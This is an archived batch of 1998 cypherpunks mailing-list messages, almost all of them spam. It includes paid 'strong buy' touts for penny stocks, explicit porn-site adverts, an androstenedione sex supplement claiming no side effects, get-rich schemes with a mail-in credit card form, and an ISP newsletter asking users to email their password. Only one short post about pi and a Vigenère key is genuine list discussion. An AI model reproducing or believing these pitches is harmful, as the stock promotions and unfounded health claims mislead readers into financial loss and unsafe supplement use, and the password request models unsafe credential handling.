From: stock-pick@stock-pick.net
Date: Sat, 10 Oct 1998 15:01:26 -0700 (PDT)
To: user@the.internet
Subject: AD: Stock-Pick Discovers Media Goldmine!!
Message-ID: <199810110145.VAA11990@mars.your-mail.com>
MIME-Version: 1.0
Content-Type: text/plain


This message is sent in compliance of the new e-mail bill: SECTION 301, 
Paragraph (a)(2)(C) of s. 1618

Sender : Stock-Pick, P.O. Box 130544, St Paul, MN  55113
Phone  : 1-612-646-8174
E-mail : stock-pick@stock-pick.net

To be removed from our mailing list, simply reply with "REMOVE" in the 
subject.

Visit http://www.stock-pick.net for full details.

Financial Highlights: Triangle Broadcasting, Inc. (OTC BB : GAAY)

Shares Outstanding (Aug 31, 1998) : 19.4 Million Shares
Current Market Capitalization (Current Stock Price of $0.05) - $970,000
Stockholders' Equity (June 30, 1998) - $2,233,470 - Equity per Share : $0.115

At current stock price of $0.05 we feel this stock to be tremendous BUY 
at these levels.  Currently there are 19.4 million shares outstanding, 
this gives a market capitalization of only $970,000 - a modest 
investment could yield enormous rewards for the investors who entered on 
the ground floor.  At current price levels $1000 would purchase 20,000
shares.

"Mark Twain said: "The secret to success is - find out where the people 
are going and get there first".  We feel that Triangle Broadcasting, Inc. 
(OTC BB : GAAY) has followed that adage to a T.	 

Triangle Broadcasting Company, Inc. (OTC BB : GAAY) is launching itself 
to a right future.  They are the first mass media company  to target gays 
and lesbians on a national level.   Successful companies always take one 
step at a time so that they never skip over something important that will 
haunt them in the future.  First, Triangle Broadcasting Company, Inc. did 
extensive surveys.  They found out what were the people's preferences.  
They also figured out what would be the most strategic way to market their 
product and what programs would be received well by both the gay and 
lesbian communities and the mass market.  They set up their programming 
and found what cities they should target first.  Triangle Broadcasting 
Company, Inc. is going to start in 15 cities.  They have chosen 15 cities 
with large gay and lesbian populations.  After they have gained acceptance 
in these markets, they will expand to a national level.  They can already 
be received by over 10,000 stations in the United States and Canada.  
Triangle Broadcasting Company, Inc. will not expand until they have made 
a presence in the markets that they are focusing on. 

Triangle Broadcast Company, Inc. hand-picked it's management 
infrastructure.  They took broadcast executives who had extensive 
knowledge about the industry.  Gay and lesbian nightclub owners were 
brought in to help formulate the programming.  Business advisors help 
with the complexities of running a business.  And last but not least real 
estate people help with the planning of which communities would be their 
first targets.

After all this was set up they contacted advertising executives of major 
companies throughout the United States and Canada.   The response was 
overwhelming.  With all the above factors, and the fact that advertisers 
are already lining up, success is almost inevitable.  This is truly an 
amazing company with nothing but positive opportunities in front of it.

Once again visit http://www.stock-pick.net for full details.

****** DISCLAIMER ******

This material is being provided by Stock-Pick, a paid public relations 
company, and is for informational purposes only and is not to be 
construed as an offer or solicitation of an offer to sell or buy any 
security. Stock-Pick is an independent electronic publication providing 
both information and factual analysis on selected companies that in the 
opinion of Stock-Pick have investment potential. Companies featured by 
Stock-Pick or company affiliates pay consideration to Stock-Pick for the 
electronic dissemination of company information. Triangle Broadcasting 
Company, Inc. has paid a consideration of 100,000 common shares of 
Triangle Broadcasting Company, Inc. stock to Stock-Pick in conjunction 
with this company profile. All statements and expressions are the opinion 
of Stock-Pick. Stock-Pick is not a registered investment advisor or a 
broker dealer. While it is our goal to locate and research equity 
investments in micro or small capitalization companies that have the 
potential for long-term appreciation, investment in the companies reviewed
are considered to be high risk and may result in loss of some or all of 
the investment. The information that Stock-Pick relies on is generally 
provided by the featured companies and also may include information from 
outside sources and interviews conducted by Stock-Pick. While Stock-Pick 
believes all sources of the information to be reliable, Stock-Pick makes 
no representation or warranty as to the accuracy of the information 
provided.  Investors should not rely solely on the information contained 
in this publication. Rather, investors should use the information 
contained in this publication as a starting point for doing additional 
independent research on the featured companies in order to allow the 
investor to form his or her own opinion regarding investing in featured 
companies. This publication contains forward looking statements that are 
subject to risk and uncertainties that could cause results to differ 
materially from those set forth in the forward-looking statements. These 
forward-looking statements represent Triangle Broadcasting Inc., judgement 
as of the date of this release. The company disclaims any intent or 
obligation to update these forward-looking statements. Factual statements 
in this publication are made as of the date stated and are subject to 
change without notice. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tony@starsnstripes.com
Date: Sat, 10 Oct 1998 17:15:01 -0700 (PDT)
To: you@starsnstripes.com
Subject: Dental / Optical Plan 2 bucks a week
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


                   The Dental-Optical Plan
                                      .
           We work with a group of your local doctors
     and dentists and are offering a Dental - Optical Plan
     that runs approximately $2 a week for an individual
    and $3 a week for the entire family with no limit to the
                          number of children!
                                      .
  Would you like our office to furnish you with the details?
                                      .
 Our doctors are grouped by AREA CODE and ZIP CODE
     The company currently only responds to requests by
                             TELEPHONE.

For Details call Toll Free 1-800-447-1996  
Please Refer to ID Code 900



This message complies with the proposed United States Federal requirements 
for commercial email plus Washington State Commercial Email Bill. for information 
see: http://www.senate.gov/~murkowski/commercialemail/ EMailAmend Text.html  

To be removed   mailto:remove@unlimitd.com?subject=remove



Sean Davis
790 W.40 Hwy ste.336
Blue Springs MO 64015
1-800-447-1996






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED SUN OCT 11 <stuffed@stuffed.net>
Date: Sun, 11 Oct 1998 01:13:35 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: EVEN MORE FREE PORN: STUFFED HAS 10 LINKS TO 100S OF FREE PICS, NEW EVERY DAY
Message-ID: <19981011071000.1373.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ AMANDA'S FANTASY
+ MISSIONARY MADNESS
+ BABES & BLOWJOBS
+ GALLERIES OF PORN
+ CUMSHOT QUEENS
+ BLOW BABY BLOW
+ FIRM BOOBS
+ PORN PRINCE
+ COLLEGE SEX
+ SLUTTYONES.COM
+ BONUS PIC 1 -> http://www.stuffed.net/home/12584.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/18130.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/2170.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/32120.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/22064.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: submitsoft@premiumproducts.com
Date: Sun, 11 Oct 1998 17:16:34 -0700 (PDT)
Subject: your classifieds.
Message-ID: <199810120016.RAA24176@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



4 WAYS TO MAKE MONEY WITH MY TWO NEW SOFTWARES!
       (LIMITED OFFER: GET BOTH FOR $30. SAVE $50 ! ACT TODAY!)
           --------------------------------------------------
My following 2 new software programs will make you money in 4 ways!
They will even do the selling for you! They are the new & affordable

        1)  100 CLASSIFIEDS '98  AD SUBMITTING SOFTWARE
            -------------------------------------------
Type in your ad, and the software will automatically submit it to
the top 100 internet free classifieds! Save time and effort!

        2)  GLOBAL CLASSIFIED '98  AD SUBMITTING SOFTWARE
            ---------------------------------------------
Same as above software, except it submits to the top international
trade free classified sites! Different from the above 100 sites!

     HERE ARE THE 4 WAYS THE TWO SOFTWARES WILL MAKE YOU MONEY:
    -----------------------------------------------------------

A)START AN AD SUBMISSION SERVICE:
 Use the 2 softwares to advertise your new service. Charge $10/ad !

B)SELL THE SOFTWARES & MAKE MONEY, WITH ZERO INVESTMENT:
 Again, use the softwares to advertise their own sale! Charge $40
 each. Get the orders, send us 50%, and keep the other 50% !

C)SPONSOR OTHER RESELLERS AND MAKE MONEY OFF THEIR SALES:
 Again, use the softwares to locate resellers all over the globe.
 Get 20% on these resellers' sales!

D)PROMOTE YOUR OWN PRODUCTS & SERVICES:
 Again, use the softwares to locate buyers and distributors all
 over the world for your products and services! If you do not
 have any product or service to offer, we shall give you a FREE
 250-money making reports on a disk. You have the right to make
 copies and sell each REPORT for $5.00!

Use the 2 softwares to place free ads over , and over, and over!
The softwares are sold for $40 EACH! If you order the 2 softwares
within 2 days of this message, you can buy BOTH of them for only
US$30 (THIRTY!) You will be saving $50 !! Plus I shall pay the 
postage anywhere in the world! This is a limited offer! ACT TODAY!
-------------------------------------------------------------------
            ORDER  FORM                          Ref:D.B.10/10
            ===========

Please PRINT the Order Form, TYPE the information, & ENCLOSE payment:
...US$30 (for the 100 Classifieds 98 & Global Classifieds softwares)
...FREE  (250-Reports Disk if you order the softwares within 48hrs)
I enclose a total of US$.... in... cash,...check,... or Money Order. 
Checks(on US banks only) take 10 days to clear.Mail all to my address. 

To order with Credit Card:fill, sign & mail (or fax to (561) 792-6175):
======================================================================
I authorize you to charge my following....Visa....M.C. with the sum of
US$.......covering my above order! Master Card or Visa only accepted.
Credit Card #.........................................Expiry:........
Signature:.................................

NAME:.........................................................
ADDRESS:......................................................
        ......................................................
CITY:..............STATE:..................ZIP:...............
COUNTRY:................

Al Jebaly
3668  161st Terrace North
Loxahatchee, Florida 33470
USA
(The above is an INTRODUCTORY offer for the above NEW AUTOMATIC
softwares! You save $50!Offer is limited & sales are final!Act now!)
--------------------------------------------------------------
Your name was given to me as someone interested in a home biz.
If this message was sent in error, please forgive me! If you
want your name to be removed, hit REPLY, type Remove, & SEND. (10/10)
--------------------------------------------------------------
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@sparky.clearworks.net
Date: Mon, 12 Oct 1998 01:24:16 -0700 (PDT)
To: info@sparky.clearworks.net
Subject: What does IBM know about ClearWorks that you don't?
Message-ID: <68645747_49581639>
MIME-Version: 1.0
Content-Type: text/plain



Undiscovered Internet Stock (CLWK OTC:BB).

What does IBM know about this company that  you don't?

Follow this link for more information on ClearWorks:

http://www.clearworks.net/news_menu_frame.htm








DISCLAIMER OF WARRANTIES AND LIABILITY

Due to the number of sources from which news and information on the Service is obtained, and the inherent hazards of electronic distribution, there may be delays, omissions or inaccuracies in such news, information and the Service.  Direct Communications Corporation AND ITS AFFILIATES, AGENTS AND LICENSORS CANNOT AND DO NOT WARRANT THE ACCURACY, COMPLETENESS, CORRECTNESS, NONINFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OF THE INFORMATION AVAILABLE THROUGH THE SERVICE, OR THE SERVICE ITSELF. NEITHER Direct Communications Corparation NOR ANY OF ITS AFFILIATES, AGENTS OR LICENSORS SHALL
BE LIABLE TO YOU OR ANYONE ELSE FOR ANY LOSS OR INJURY CAUSED IN WHOLE OR PART BY ITS NEGLIGENCE OR CONTINGENCIES BEYOND ITS CONTROL IN PROCURING, COMPILING,
INTERPRETING, REPORTING OR DELIVERING THE SERVICE AND ANY NEWS AND INFORMATION
THROUGH THE SERVICE. ALL SUCH DOCUMENTS AND RELATED GRAPHICS ARE PROVIDED "AS IS" WITHOUT WARRANTY OFANY KIND. Direct Communications Corporation AND/OR ITS RESPECTIVE SUPPLIERS HEREBY DISCLAIM ALL WARRANTIES AND CONDITIONS WITH REGARD TO THIS INFORMATION, INCLUDING ALL IMPLIED WARRANTIES AND FITNESS FOR A PARTICULAR PURPOSE, TITLE AND NON-INFRINGEMENT.

THE STOCK CHOICES LISTED IN THIS EMAIL MAY BE CONSIDERED BY SOME INVESTMENT
ADVISORS AS HIGH RISK. COMPANY BACKGROUND PROFILES AT THE WEBSITE STATED IN THE EMAIL AND IN ANY EMAILED NEWSLETTERS DO NOT CONSTITUTE AN OFFER TO SELL OR SOLICITATION OF AN OFFER TO PURCHASE ANY SECURITIES. STATEMENTS IN THESE PROFILES MAY CONTAIN CERTAIN FORWARD-LOOKING STATEMENTS WITHIN THE MEANING OF SECTION 27A OF THE SECURITIES ACT OF 1933, SECTION 21E OF THE EXCHANGE ACT OF 1934, AND THE PRIVATE SECURITIES LITIGATION REFORM ACT OF 1995, SUBJECT TO THE SAFE HARBOUR CREATED BY THESE SECTIONS. ACTUAL RESULTS MAY DIFFER MATERIALLY FROM THE PROFILED COMPANY'S EXPECTATIONS. CERTAIN FACTORS COULD RESULT IN FUTURE EVENTS AND PERFORMANCE DIFFERING MATERIALLY FROM THESE STATEMENTS. THESE FACTORS INCLUDE, BUT ARE NOT LIMITED TO, SECURING CAPITAL ON A TIMELY BASIS; ENTERING INTO CONTRACTS WITH PROSPECTIVE CUSTOMERS; RETENTION OF KEY PERSONNEL AND CONSULTANTS, INCLUDING THOSE INVOLVED IN TECHNICAL EFFORTS; AND CHANGES IN TECHNOLOGY. SECURITIES DISCUSSED HERE MAY NOT HAVE BEEN REGIST!
ERED WITH
THE UNITED STATES SECURITIES AND EXCHANGE COMMISSION BECAUSE THEY ARE BELIEVED TO  BE EXEMPT FROM REGISTRATION UNDER SECTION 4(2) OF THE SECURITIES ACT OF 1933 AND/OR RULE 504 PROMULGATED BY THE SECURITIES AND EXCHANGE COMMISSION AS PART OF REGULATION D. WHILE EFFORTS ARE MADE TO SELECT THE BEST PERFORMING STOCKS, TRADERS MUST BE AWARE THAT MARKETS CAN BE HIGHLY VOLATILE AND UNPREDICTABLE. THE SELECTIONS ARE INTENDED FOR TRADERS AND INVESTORS WHO PLAN TO EMPLOY SPECULATIVE CAPITAL ONLY. OFFICERS AND/OR EMPLOYEES OF Direct Communications Corporation MAY INEVITABLY, FROM TIME TO TIME, HOLD POSITIONS IN THE STOCKS DISCUSSED. HOWEVER, STRICT ETHICAL PROCEDURES ARE IN PLACE TO LIMIT ADVANCE KNOWLEDGE AMOUNG STAFF SO THAT NO POSITION TRADES ARE MADE IN THE WEEKS BEFORE OR AFTER MENTION ON THIS EMAIL. Direct Communications Corporation is paid 5,000 Shares of Clearworks common stock with options for another 5,000 shares baesd on performance plus $3,000 expenses.  IN NO EVENT WILL Dire!
ct Communications Corporation., ITS AFFILIATES, AGENTS OR LICENSORS BE LIABLE TO YOU OR ANYONE ELSE FOR ANY DECISION MADE OR ACTION TAKEN BY YOU IN RELIANCE ON SUCH CHOICES, NEWS, OR INFORMATION OR FOR ANY CONSEQUENTIAL, SPECIAL OR SIMILAR DAMAGES,
EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. YOU AGREE THAT THE LIABILITY OF Direct Communication Corporation., ITS AFFILIATES, AGENTS AND LICENSORS, IF ANY, ARISING OUT OF ANY KIND OF LEGAL CLAIM (WHETHER IN CONTRACT, TORT OR OTHERWISE) IN ANY WAY CONNECTED WITH THE SERVICE OR THE NEWS AND INFORMATION.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ginadi@topchat.com
Date: Sun, 11 Oct 1998 23:06:22 -0700 (PDT)
Subject: Hello from Miami,
Message-ID: <199810120606.XAA26042@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Want to have your own successful internet business? 
Be your own boss? 
This is an exciting new money-making opportunity 
that can bring you the income you've been looking for!

 Contact us and learn about one 
 of the MOST SUCCESSFUL BUSINESSES 
 to run on the internet today:
 
INTERNATIONAL DATING and MATCHMAKING SERVICE. 
       Help Singles around the World!!!      


 Meet people * Have fun * Make money * Travel
          Work part time or full time.
 We provide all the necessary software and support.
Send for info to: ginadi@topchat.com

Sincerely,
Gina Di'Lombartti

Matchmaker International
  Milano - Branch
  14 Via Galvani
  20124 Milano
  ITALIA

tel: 39- (02) 69-837, when busy please e-mail me.
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED MON OCT 12 <stuffed@stuffed.net>
Date: Mon, 12 Oct 1998 02:07:43 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: EVEN MORE FREE PORN: STUFFED HAS 10 LINKS TO 100S OF FREE PICS, NEW EVERY DAY
Message-ID: <19981012071001.10152.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ YVONNE'S ASIAN GIRLS
+ SHADOW X
+ INSTANT BONER
+ FREE SLEEZE
+ MISS TEASE FREE XXX PLAYHOUSE
+ NAKED BLONDES
+ EROTIC VIXENS
+ AMY'S XXX HARDDRIVE
+ PORN FUN'S BABES
+ A HOLE LOTTA LESBIANS
+ BONUS PIC 1 -> http://www.stuffed.net/home/7198.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/29364.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/16306.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/13875.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/18326.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: regnic902c@gte.net
Date: Mon, 12 Oct 1998 00:39:47 -0700 (PDT)
To: zapperlin80c@gte.net
Subject: Do not renew my membership
Message-ID: <9810120738.AA00162@mars.cableol.net>
MIME-Version: 1.0
Content-Type: text/plain


I want to cancel my membership.  Please do not renew
my membership to your site. Cancel me now.

Are you tired of getting these messages?
Do you want your members to stay members?
Do you want to increase your membership?

If the above three questions are answered YES,
then you need the products from Pornholio.

Day after day, month after month, Pornholio provides
the finest quality adult XXX products for webmasters
who are making money.

Pornholio products keep your members coming back.

Want to find out more about our products?  Our great
photos?  Our great hidden cams?  Our incredible
video feeds?  

Want a trial run on our products?

Then pick up the phone NOW and call Dave.

(818) 757-1267

Be sure to tell Dave you got Sunday's email so 
you can get this week's specials.

Do it now or you'll get more cancellations.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aimkt@aimarketinginc.com
Date: Mon, 12 Oct 1998 17:10:07 -0700 (PDT)
To: aimkt@aimarketinginc.com
Subject: Better than Viagra-Ask Mark McGwire
Message-ID: <199810130010.RAA03074@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



************************************************************************
Removal Instructions can be found at the bottom of this page
 
************************************************************************
                      Announcing

                 ***LIBIDO PLUS***



LIBIDO PLUS already includes the most talked about and most effective BODY REBUILDING ingredient in America today. That key ingredient is ANDROSTENEDIONE. The same powerful ingredient that St. Louis Cardinals baseball player MARK McGWIRE has been using as a PERFORMANCE ENHANCER and BODY REBUILDER. Doing so has helped him to better endure the physical demands of the extensive major league baseball season and in the process he was able to establish a new all time major league home run record.


          THIS MAKES LIBIDO PLUS



The most powerful libido enhancing product ever developed for both women and men

Formulated to prolong and enhance your sexual enjoyment


LIBIDO PLUS is formulated to enhance:

                  * Your DESIRE
                     * Your STAMINA
                        * Your PLEASURE 
                           * Your PERFORMANCE 


* All Natural
* No damaging side effects
* No prescription necessary
* Physician developed
* Physician recommended
* Patented Formulation
* Easily Affordable
* Free - $500 in money saving coupons
  for items you use every day

We are so confident that you will be totally satisfied with LIBIDO PLUS that we unconditionally guarantee it.

Click on the hyper link below to find out more about the many benefits of LIBIDO PLUS, the $500 in free money saving coupons and our unbelieveable guarantee.

                          http://www.libidomax.com

************************************************************************
This Message is intended for the Health Conscious Individual. If
we have reached you by mistake please accept our apologies. If you wish
to be deleted from our database, please reply with the subject "R emove"

************************************************************************
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wllstrtmore@digisys.net
Date: Wed, 14 Oct 1998 02:14:41 -0700 (PDT)
To: silver3112@aol.com
Subject: RE:  INTERNET STOCKWATCH!   I S M R
Message-ID: <156874589632.GAA10987@smtp.207.115.225.192>
MIME-Version: 1.0
Content-Type: text/plain


Company:  Internet Stock Market Resources
Symbol:   I S M R
Price:    2  1/4  ($2.25/share)

" I S M R is evolving into one of the internet's  main
financial web portals not unlike E*Trade in its 
future potential."

As a featured stock in both Success and Opportunist 
magazines and as a content partner with Time Warner's
Web TV   I S M R is rated a "VERY STRONG BUY".

For more information on I S M R go to:
http://quote.yahoo.com/



  
 
 
 plxII7.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listmaster@extensis.com
Date: Tue, 13 Oct 1998 01:08:16 -0700 (PDT)
To: undisclosed-recipients:;
Subject: Quark-to-HTML ---- Extensis BeyondPress
Message-ID: <bulk.15282.19981012235438@ssl.extensis.com>
MIME-Version: 1.0
Content-Type: text/plain


BeyondPress 4.0 
The Award-winning Quark-to-HTML XTension from Extensis
http://www.extensis.com/BeyondPress/buyonline


- Convert QuarkXPress to HTML or DHTML with one click
- New! Includes Extensis PhotoAnimator for creating animated GIFs 
- Compatible with QuarkXPress 3.31, 4.0 (Mac), & 4.0 (Win)
- NOW Available for WINDOWS!
 

Extensis BeyondPress 4.0-our award-winning XTension that takes your QuarkXPress documents to the web-is now available for Windows, with advanced DHTML features!

Extensis BeyondPress allows you to repurpose your existing QuarkXPress documents for the Web.  BeyondPress preserves the layout of your documents using HTML tables or DHTML for cutting-edge design. 

Quickly create animated GIFs with Extensis PhotoAnimator, a new addition to the BeyondPress line-up.  Once created, simply drag the animation into your layout and see it displayed LIVE inside QuarkXPress.  

Finally, add hyperlinks, image maps, and more-right in QuarkXPress. Save hours by repurposing your documents for the Web with Extensis BeyondPress.

Extensis BeyondPress-It's the best way to take Quark to the Web.


Special Offer:
Purchase BeyondPress for only $299.95!
To download a FREE demo, get information, or to buy on-line, visit http://www.extensis.com/BeyondPress/buyonline

Or call Extensis at 1(800) 796-9798 Ext. 404 or (503) 274-2020 Ext. 404.

BeyondPress is 100% compatible with Quark XPress 3.31 & 4.0.

PS. We have made every effort to ensure this message is being sent only to people who have expressed interest in Extensis products.  If we have sent this to you in error, please accept our apologies and reply with "REMOVE" in the subject line for automatic exclusion from future communications.  If you know someone who would like to be on our mailing list have them send an email to listmaster@extensis.com with "ADD" in the subject line and their email address in the body.

P.P.S. This message is intended for North American customers.  If you are located outside of North America and have received this message, please visit  www.extensis.com/purchase/ to find the nearest local distributor in your country.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED TUE OCT 13 <stuffed@stuffed.net>
Date: Tue, 13 Oct 1998 02:17:53 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: EVEN MORE FREE PORN: STUFFED HAS 10 LINKS TO 100S OF FREE PICS, NEW EVERY DAY
Message-ID: <19981013071001.11864.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ XXX VAGINAS
+ FOR FREE SEX
+ JEN'S PALACE
+ HENTAI BIJUTU
+ VALERIE'S GIRLS
+ EUROPEAN WOMEN
+ TALENT SEARCH
+ CUM COVERED FACES
+ BLOWJOB HEAVEN
+ PORNFEEDS
+ BONUS PIC 1 -> http://www.stuffed.net/home/1812.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/7830.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/30442.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/28398.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/14588.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Walter Burton <wburton@pipestream.com>
Date: Tue, 13 Oct 1998 05:06:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: _PI_ was crap, but...
Message-ID: <013D438ED22ED2119F630060082F763C08A760@kenny.pipestream.com>
MIME-Version: 1.0
Content-Type: text/plain


It did inspire me to consider an interesting line of thought:

Maybe pi is the cyphertext and the 216-digit "Holy Unspeakable Name of
God" is the Vegenere-ish key.

I'll get to work and see if I can crack the message by lunchtime.


\\/alter




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Walter Burton <wburton@pipestream.com>
Date: Tue, 13 Oct 1998 06:53:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: _PI_ was crap, but...
Message-ID: <013D438ED22ED2119F630060082F763C08A783@kenny.pipestream.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

It did inspire me to consider an interesting line of thought:

Maybe pi is the cyphertext and the 216-digit "Holy Unspeakable Name of
God" is the Vegenere-ish key.

I'll get to work and see if I can crack the message by lunchtime.


\\/alter
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com>
Comment: For my public key, send a msg with "public key" in the subj.

iQA/AwUBNiNatI0Llo1Bf1gWEQLIfACguQpfpZLC3cT0Iw/vj/ncDlHWcPIAn3W5
ZoMzjfYNl4sD+J2sqhtZ6fwU
=GZcu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aimkt@aimarketinginc.com
Date: Tue, 13 Oct 1998 15:43:46 -0700 (PDT)
To: aimkt@aimarketinginc.com
Subject: Better than Viagra-Ask Mark McGwire
Message-ID: <199810132243.PAA12748@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



************************************************************************
Removal Instructions can be found at the bottom of this page
 
************************************************************************
                      Announcing

                 ***LIBIDO PLUS***



LIBIDO PLUS already includes the most talked about and most effective BODY REBUILDING ingredient in America today. That key ingredient is ANDROSTENEDIONE. The same powerful ingredient that St. Louis Cardinals baseball player MARK McGWIRE has been using as a PERFORMANCE ENHANCER and BODY REBUILDER. Doing so has helped him to better endure the physical demands of the extensive major league baseball season and in the process he was able to establish a new all time major league home run record.


          THIS MAKES LIBIDO PLUS



The most powerful libido enhancing product ever developed for both women and men

Formulated to prolong and enhance your sexual enjoyment


LIBIDO PLUS is formulated to enhance:

                  * Your DESIRE
                     * Your STAMINA
                        * Your PLEASURE 
                           * Your PERFORMANCE 


* All Natural
* No damaging side effects
* No prescription necessary
* Physician developed
* Physician recommended
* Patented Formulation
* Easily Affordable
* Free - $500 in money saving coupons
  for items you use every day

We are so confident that you will be totally satisfied with LIBIDO PLUS that we unconditionally guarantee it.

Click on the hyper link below to find out more about the many benefits of LIBIDO PLUS, the $500 in free money saving coupons and our unbelieveable guarantee.

                          http://www.libidomax.com

************************************************************************
This Message is intended for the Health Conscious Individual. If
we have reached you by mistake please accept our apologies. If you wish
to be deleted from our database, please reply with the subject "R emove"

************************************************************************
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: news@quake.connectfree.net
Date: Tue, 13 Oct 1998 08:44:01 -0700 (PDT)
Subject: No Subject
Message-ID: <199810131545.QAA03849@swampthing.connectfree.net>
MIME-Version: 1.0
Content-Type: text/plain


Connect FREE Newsletter October 98


Welcome to Connect Free, and thank you for joining our service. We hope you
find our Second Newsletter informative. September's Newsletter can be
viewed on our web site at the bottom of the FREE Internet page.


FreeServe & Dixons

Now we all know that Free Internet access is going to be the norm very
shortly and users of the Internet like yourselves would like to have
several connections to the Internet from different ISP's and of course you
will choose the service that offers the best performance.

With the launch of Dixons Freeserve service some of our users have taken
the decision to have a second account - great idea.

If you decide to use this service alongside your Connect FREE account
please do not use the CD install that Dixons provide - if you do, then you
may just find that your Connect FREE account will no longer work. It is
possible to configure the Freeserve system manually and then you will be
able to use any
account on your system without problem.

----------------------------------------------------------------------------

Future Developments

In November, Connect FREE will be able to offer an even better service
because we will have 1Gig of Internet bandwidth for fast access to the
Internet and thousands of modems and lines ensuring that you get a
guaranteed first time connection every time.

We will be spending one million pounds on new equipment, for example new
modem racks, routers and servers. This new equipment will be housed at
Telehouse, London, the main exchange for all UK Internet traffic.

Connect FREE is aiming to be not only the first Internet Service Provider
to offer FREE Internet access in the UK but also to be the Best.

----------------------------------------------------------------------------

POP3 & SMTP Mail

During November Connect FREE is going to be offering all it's customers
FREE unlimited POP3 e-mail addresses and unlimited aliases to each e-mail
account.

----------------------------------------------------------------------------

Free Web Space

During December we plan to offer all our Connect FREE customers, FREE web
space.

----------------------------------------------------------------------------

Proxy Server

Connect FREE does not have a Proxy Server. If you find that you can connect
to the Connect FREE service but you cannot view any web pages the
likelihood is that you have the Proxy Server setting *Ticked* in your browser
configuration. This can happen if you put another Internet Service
Providers software onto your PC and the automatic configuration will enable
this setting.

----------------------------------------------------------------------------

News Server

The automatic news configuration routine on our website does not work for
everybody. If you have problems using this facility then we suggest you
set-up News manually using something like Outlook Express. Our News Server
address is:  news.connectfree.net

----------------------------------------------------------------------------

Change of Details

If you need to change your personal details i.e. email address etc, then
you will soon be able to do this via a web page on the Connect FREE website.

----------------------------------------------------------------------------

Information Line

If you do need to contact Connect FREE by phone or email please ensure that
you provide your LoginID & Password with every communication.

----------------------------------------------------------------------------

Improvements

Connect FREE would like to hear from you, if there is any way in which you
think we could improve our service to you, or add more content to the
Connect FREE website.

It is Connect FREE policy not to send unwanted rubbish by e-mail or junk
advertising by any other means. All we ask is that you receive our monthly
newsletter informing you of any changes to the service and any new service
that may come available which you may benefit from.

